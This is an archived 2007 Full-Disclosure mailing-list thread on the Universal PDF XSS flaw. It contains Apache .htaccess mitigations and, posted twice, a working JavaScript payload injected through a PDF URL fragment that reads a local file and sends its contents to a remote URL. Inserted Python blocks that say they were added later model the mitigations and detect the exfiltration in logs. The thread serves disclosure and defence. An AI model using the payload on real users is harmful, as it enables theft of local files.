Re: [Full-disclosure] Universal PDF XSS After Party(posible solution)

2007-01-04 Thread Darren Bounds
If I recall correctly from the Content-Disposition HTML attachment
handling vulnerabilities last year, Opera didn't reliably abide by the
Content-Disposition header.

Additionally, Content-Disposition support in IE, Firefox, Opera,
Safari and a few others was extremely inconsistent from version to
version.


-- 

Thank you,
Darren Bounds



On 1/4/07, Noe Espinoza M. <[EMAIL PROTECTED]> wrote:
> We need to force the users to download the PDF files.
>
> And we can add the following code to httpd.conf or .htaccess:
>
> # Mark requests for .pdf paths, then send those responses as downloads
> SetEnvIf Request_URI "\.pdf$" requested_pdf=pdf
> Header add Content-Disposition "Attachment" env=requested_pdf
>
>
> Another solution is to protect our PDF files from external links (hotlinking).
>
> Add in .htaccess:
>
> # Redirect PDF requests whose Referer is set but is not from example.com
> RewriteEngine on
> RewriteCond %{HTTP_REFERER} !^$
> RewriteCond %{HTTP_REFERER} !^http://([-a-z0-9]+\.)?example\.com [NC]
> RewriteRule .*\.(pdf)$ http://www.example.com/images/noexternal.gif [R,NC,L]
>
>
> Source:
> http://seguinfo.blogspot.com/2007/01/hacking-con-browser-plugins.html
>
>
>
> -Original message-
> From: pdp (architect) [mailto:[EMAIL PROTECTED]
> Sent: Thursday, 04 January 2007 7:17
> To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; Web
> Security
> Subject: Universal PDF XSS After Party
>
> Everybody knows about it. Everybody talks about it. We had a nice
> party. It is time for estimating the damages. In this article I will
> try to show the impact of the Universal PDF XSS vulnerability by
> explaining how it can be used in real life situations.
>
> http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



Re: [Full-disclosure] Universal PDF XSS After Party(posible solution)

2007-01-04 Thread Noe Espinoza M.
We need to force the users to download the PDF files.

And we can add the following code to httpd.conf or .htaccess:

# Mark requests for .pdf paths, then send those responses as downloads
SetEnvIf Request_URI "\.pdf$" requested_pdf=pdf
Header add Content-Disposition "Attachment" env=requested_pdf


Another solution is to protect our PDF files from external links (hotlinking).

Add in .htaccess:

# Redirect PDF requests whose Referer is set but is not from example.com
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://([-a-z0-9]+\.)?example\.com [NC]
RewriteRule .*\.(pdf)$ http://www.example.com/images/noexternal.gif [R,NC,L]


Source:
http://seguinfo.blogspot.com/2007/01/hacking-con-browser-plugins.html



-Original message-
From: pdp (architect) [mailto:[EMAIL PROTECTED]
Sent: Thursday, 04 January 2007 7:17
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; Web
Security
Subject: Universal PDF XSS After Party

Everybody knows about it. Everybody talks about it. We had a nice
party. It is time for estimating the damages. In this article I will
try to show the impact of the Universal PDF XSS vulnerability by
explaining how it can be used in real life situations.

http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

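A Python model of the two posted .htaccess rules, added here as an example (it is not from the post, the blog it cites, or Apache itself), to show what they cover and what they let through: the SetEnvIf extension match is case-sensitive, an empty Referer is deliberately passed by the `!^$` condition, and the Referer pattern has no terminator after the host. The tightened patterns and the Referer values in the `.test` domain are my assumptions.

```python
import re

# The two patterns exactly as posted in the .htaccess snippet, in Python re.
# SetEnvIf carries no [NC], so its regex is case-sensitive; the RewriteCond
# does carry [NC].
POSTED_PDF_RULE = re.compile(r"\.pdf$")
POSTED_REFERER_OK = re.compile(r"^http://([-a-z0-9]+\.)?example\.com", re.I)

# Tightened equivalents (my additions, not from the post). In Apache:
#   SetEnvIfNoCase Request_URI "\.pdf$" requested_pdf=pdf
#   RewriteCond %{HTTP_REFERER} !^https?://([-a-z0-9]+\.)?example\.com([/:]|$) [NC]
# The ([/:]|$) terminator rejects a Referer host that merely starts with
# "example.com".
HARDENED_PDF_RULE = re.compile(r"\.pdf$", re.I)
HARDENED_REFERER_OK = re.compile(r"^https?://([-a-z0-9]+\.)?example\.com([/:]|$)", re.I)


def decide(request_uri, referer,
           pdf_rule=POSTED_PDF_RULE, referer_ok=POSTED_REFERER_OK):
    """Simplified model of the posted rules (ignores Apache phase ordering).

    Returns (action, content_disposition): action is "serve" or "redirect";
    content_disposition is "attachment" when the Header rule fires, else None.
    """
    # RewriteRule .*\.(pdf)$ ... [R,NC,L]: only PDF paths are redirected,
    # matched case-insensitively because of [NC].
    is_pdf_path = re.search(r"\.pdf$", request_uri, re.I) is not None
    # RewriteCond %{HTTP_REFERER} !^$ : an EMPTY Referer is let through, so
    # direct navigation and Referer-stripping clients are never redirected.
    foreign_referer = referer != "" and referer_ok.search(referer) is None
    if is_pdf_path and foreign_referer:
        return ("redirect", None)
    # SetEnvIf Request_URI "\.pdf$" ... + Header add Content-Disposition
    disposition = "attachment" if pdf_rule.search(request_uri) else None
    return ("serve", disposition)


def decide_hardened(request_uri, referer):
    """Same model with the tightened patterns."""
    return decide(request_uri, referer, HARDENED_PDF_RULE, HARDENED_REFERER_OK)


if __name__ == "__main__":
    for uri, ref in [("/report.pdf", ""), ("/REPORT.PDF", ""),
                     ("/report.pdf", "http://example.com.evil.test/")]:
        print(uri, repr(ref), "posted:", decide(uri, ref),
              "hardened:", decide_hardened(uri, ref))
```

Referer is supplied by the client, so even the tightened rule only deters casual hotlinking; the Content-Disposition rule is the one that addresses the plugin issue discussed in the thread.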


Re: [Full-disclosure] Universal PDF XSS After Party

2007-01-04 Thread T Biehn

Shows up in a log like this:
127.0.0.1 - - [04/Jan/2007:10:57:03 -0500] "GET /whatever.htm?content=%3Chtml%3E%3Chead%3E%3Cmeta%20http-equiv=%22content-type%22%20content=%22text/html;charset=ISO-8859-1%22%3E%3Cmeta%20name=%22generator%22%20content=%22Adobe%20GoLive%205%22%3E%3Ctitle%3EAdobe%20Acrobat%20Standard%20and%20Professional%20Read%20Me%3C/title%3E%3C/head%3E%3Cbody%20bgcolor=%22 HTTP/1.1" 404 403 "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"

You could obviously have a few iframes open on a site that would transfer each
chunk of the file, 64 bit encoded or what have you.

On 1/4/07, T Biehn <[EMAIL PROTECTED]> wrote:


file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);window.location = "http://localhost:80/whatever.htm?content="
+ xhr.responseText;}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat
6.0/ReadMe.htm', true);xhr.send(null); <- sends a local file to a remote
location.

Readable:
function cXHR(){ // Grabs a legit XHR: the two ActiveX flavours first, then the native object.
    try{
        return new ActiveXObject('Msxml2.XMLHTTP');
    }catch(e){}
    try{
        return new ActiveXObject('Microsoft.XMLHTTP');
    }catch(e){}
    try{
        return new XMLHttpRequest();
    }catch(e){}
    return null;
}
var xhr = cXHR(); // For grabbing
xhr.onreadystatechange = function(){
    if (xhr.readyState == 4){
        alert(xhr.responseText);
        window.location = "http://localhost:80/whatever.htm?content=" +
            xhr.responseText;
    }
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
    true);
xhr.send(null);

Works in FFOX / Opera, not in IE.

On 1/4/07, pdp (architect) <[EMAIL PROTECTED]> wrote:
>
> Everybody knows about it. Everybody talks about it. We had a nice
> party. It is time for estimating the damages. In this article I will
> try to show the impact of the Universal PDF XSS vulnerability by
> explaining how it can be used in real life situations.
>
> http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>


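Added detection example (not from the post or any tool it mentions): a Python scan of Apache combined-format access or proxy log lines for the shape T Biehn's log line shows, a query parameter whose percent-decoded value is HTML markup or is implausibly long. The sample lines are constructed, modelled on the posted one with the payload shortened; the 512-character threshold is my assumption.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A decoded query value containing an HTML tag: <html>, <meta http-equiv=, </title>
TAG_RE = re.compile(r"<\s*/?[a-z][a-z0-9]*[\s>/]", re.I)


def suspicious_params(line, max_len=512):
    """Names of the query parameters on one log line whose percent-decoded
    value contains markup or is implausibly long, which is the shape of the
    posted exfiltration request. Returns [] for benign or unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    for pair in urlsplit(m.group("target")).query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote(raw)
        if len(value) > max_len or TAG_RE.search(value):
            hits.append(name)
    return hits


def scan(lines):
    """(client host, request path, flagged parameters) for each flagged line."""
    findings = []
    for line in lines:
        params = suspicious_params(line)
        if params:
            m = LOG_RE.match(line)
            findings.append((m.group("host"), urlsplit(m.group("target")).path, params))
    return findings


# Constructed sample lines modelled on the one in the post (payload shortened).
SAMPLE_LOG = [
    '127.0.0.1 - - [04/Jan/2007:10:57:03 -0500] "GET /whatever.htm?content='
    '%3Chtml%3E%3Chead%3E%3Ctitle%3EAdobe%20Acrobat%20Read%20Me%3C/title%3E%3C/head%3E'
    ' HTTP/1.1" 404 403 "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1)'
    ' Gecko/20061204 Firefox/2.0.0.1"',
    '127.0.0.1 - - [04/Jan/2007:10:58:11 -0500] "GET /docs/report.pdf?lang=en HTTP/1.1"'
    ' 200 48211 "http://www.example.com/docs/" "Mozilla/5.0"',
    '127.0.0.1 - - [04/Jan/2007:10:58:12 -0500] "GET /search?q=%3C3%20you HTTP/1.1"'
    ' 200 1200 "" "Mozilla/5.0"',
]
```

The third sample line decodes to `<3 you` and is not flagged, which is why the tag pattern requires a letter after `<` rather than matching any angle bracket.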

Re: [Full-disclosure] Universal PDF XSS After Party

2007-01-04 Thread T Biehn

file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);window.location =
"http://localhost:80/whatever.htm?content=" +
xhr.responseText;}};xhr.open('GET',
'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);xhr.send(null); <- sends a local file to a remote location.

Readable:
function cXHR(){ // Grabs a legit XHR: the two ActiveX flavours first, then the native object.
    try{
        return new ActiveXObject('Msxml2.XMLHTTP');
    }catch(e){}
    try{
        return new ActiveXObject('Microsoft.XMLHTTP');
    }catch(e){}
    try{
        return new XMLHttpRequest();
    }catch(e){}
    return null;
}
var xhr = cXHR(); // For grabbing
xhr.onreadystatechange = function(){
    if (xhr.readyState == 4){
        alert(xhr.responseText);
        window.location = "http://localhost:80/whatever.htm?content=" +
            xhr.responseText;
    }
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
    true);
xhr.send(null);

Works in FFOX / Opera, not in IE.

On 1/4/07, pdp (architect) <[EMAIL PROTECTED]> wrote:


Everybody knows about it. Everybody talks about it. We had a nice
party. It is time for estimating the damages. In this article I will
try to show the impact of the Universal PDF XSS vulnerability by
explaining how it can be used in real life situations.

http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



[Full-disclosure] Universal PDF XSS After Party

2007-01-04 Thread pdp (architect)
Everybody knows about it. Everybody talks about it. We had a nice
party. It is time for estimating the damages. In this article I will
try to show the impact of the Universal PDF XSS vulnerability by
explaining how it can be used in real life situations.

http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
